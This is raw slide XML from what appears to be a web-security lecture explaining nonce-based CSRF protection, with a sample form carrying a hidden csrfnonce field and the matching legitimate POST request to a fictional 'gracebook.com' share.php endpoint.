              </a:rPr>
              <a:t>share.ph</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>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7035" y="450638"/>
            <a:ext cx="7299960" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4368800" y="3124149"/>
            <a:ext cx="7518400" cy="2568289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="51647" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="122764" marR="4439809">
              <a:spcBef>
                <a:spcPts val="407"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/share.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Mozilla/5.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Accept:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> */*</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122764"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>application/x-www-form-urlencoded;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122764"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>charset=UTF-8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122764"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="40" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gracebook.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122764"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="120" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="122764"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-47" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>good!&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>csrfnonce=av834favcb623</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="2108200"/>
            <a:ext cx="7518400" cy="669542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121070">
              <a:lnSpc>
                <a:spcPts val="1693"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"share.php"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"post"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121070"/>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"csrfnonce" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"av834favcb623"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121070"/>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"textarea"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"text"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>good!"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="1615761"/>
            <a:ext cx="7518400" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5638800" h="369569">
                <a:moveTo>
                  <a:pt x="5638800" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563880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406400" y="1615761"/>
            <a:ext cx="7518400" cy="410369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="40640" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="847" algn="ctr">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4368800" y="5709529"/>
            <a:ext cx="7518400" cy="492760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5638800" h="369570">
                <a:moveTo>
                  <a:pt x="5638800" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4368800" y="5709530"/>
            <a:ext cx="7518400" cy="412078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="42333" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="333"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>compares </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 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128" y="450638"/>
            <a:ext cx="4804833" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Case</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>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4" name="object 4"/>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5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140527" y="3026156"/>
            <a:ext cx="10724727" cy="2900680"/>
            <a:chOff x="855395" y="2269617"/>
            <a:chExt cx="8043545" cy="2175510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
